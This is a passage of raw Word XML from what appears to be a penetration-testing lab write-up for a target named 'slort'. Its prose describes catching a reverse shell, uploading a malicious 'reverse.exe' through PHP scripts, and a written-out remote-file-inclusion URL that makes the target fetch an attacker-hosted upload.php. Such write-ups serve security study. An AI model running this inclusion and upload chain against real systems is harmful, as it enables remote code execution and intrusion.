    <w:p w14:paraId="2C1AD94B" w14:textId="27BC3E1B" w:rsidR="005E05E5" w:rsidRDefault="005E05E5"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On the left terminal an HTTP server is hosted, on the right we connected back to our local machine IP (192.168.45.232). As seen in the image, we were able to get the response on the left.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27B003" w14:textId="4B94E070" w:rsidR="005E05E5" w:rsidRPr="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E05E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>reverse.exe is visible after a successful connection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25985DB8" w14:textId="77777777" w:rsidR="00AB5FED" w:rsidRDefault="00AB5FED" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED40DA7" w14:textId="75BD63D7" w:rsidR="00737C68" w:rsidRDefault="00013CF5"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7DAC130F" wp14:editId="04929C49">
            <wp:extent cx="8229600" cy="3819525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="61148812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8124"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819525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB397D3" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F5C18E" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520211E8" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EC48AC" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440D122D" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59753DF5" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D1152E" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2307B82C" w14:textId="77777777" w:rsidR="00556153" w:rsidRDefault="00556153" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B83F0D8" w14:textId="6CF7CF08" w:rsidR="005E05E5" w:rsidRDefault="005E05E5"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As there </w:t>
      </w:r>
      <w:r w:rsidR="002C5D1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> no option available to us to upload the malicious ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="005E05E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="002C5D1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, we created two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C5D1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C5D1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts which would help us to upload the file and run it consequently. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3AC8B9" w14:textId="77777777" w:rsidR="00556153" w:rsidRDefault="00556153" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5EE056" w14:textId="4F642734" w:rsidR="00556153" w:rsidRDefault="00013CF5"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5040CD55" wp14:editId="4197378F">
            <wp:extent cx="8229600" cy="1976120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="135872975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29756"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1976120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D5DA2" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C9E32F" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8D2681" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206E6687" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC5D0B3" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DA2CFB" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15598D65" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2B55F7" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D87221" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CEEA80" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAEF999" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED0CAE4" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471F2F09" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCBF161" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA71D0B" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F910671" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77831D66" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B82ABD3" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE877C3" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F402EA4" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6049938E" w14:textId="6F6FC43B" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F"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The snippet below is the reference we took to create the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> script used above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21161F5D" w14:textId="77777777" w:rsidR="002C5D1F" w:rsidRDefault="002C5D1F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEC0673" w14:textId="376808D1" w:rsidR="00070044" w:rsidRDefault="00D44BC3" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D271304" wp14:editId="7A0BD5DD">
            <wp:extent cx="8229600" cy="4220210"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="12382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13985" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8229600" cy="4220210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB46696" w14:textId="77777777" w:rsidR="00D44BC3" w:rsidRDefault="00D44BC3" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC7DA28" w14:textId="340468E8" w:rsidR="00943237" w:rsidRDefault="00000000" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="003B694C" w:rsidRPr="008A00D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          </w:rPr>
          <w:t>https://www.dostips.com/forum/viewtopic.php?t=8485</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F33183D" w14:textId="77777777" w:rsidR="00D44BC3" w:rsidRDefault="00D44BC3" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9DF9F0" w14:textId="77777777" w:rsidR="00D44BC3" w:rsidRDefault="00D44BC3" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559C471B" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035742A1" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3566CDD4" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606E1827" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D138469" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67910739" w14:textId="682E1F39" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>On the left, we again started the HTTP server to upload the ‘reverse.exe’ to the remote IP. On the right the command was completed successfully as seen below. (</w:t>
      </w:r>
      <w:r w:rsidRPr="003B694C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://192.168.225.53:4443/site/index.php?=http://192.168.45.232/slort/upload.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FC577" w14:textId="77777777" w:rsidR="00D44BC3" w:rsidRDefault="00D44BC3" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="387E3C91" w14:textId="6A03DF56" w:rsidR="00013CF5" w:rsidRDefault="00013CF5"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319BE03A" wp14:editId="5079CAFF">
            <wp:extent cx="8229600" cy="4006215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15836337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33715"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006215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB927B7" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB9F176" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
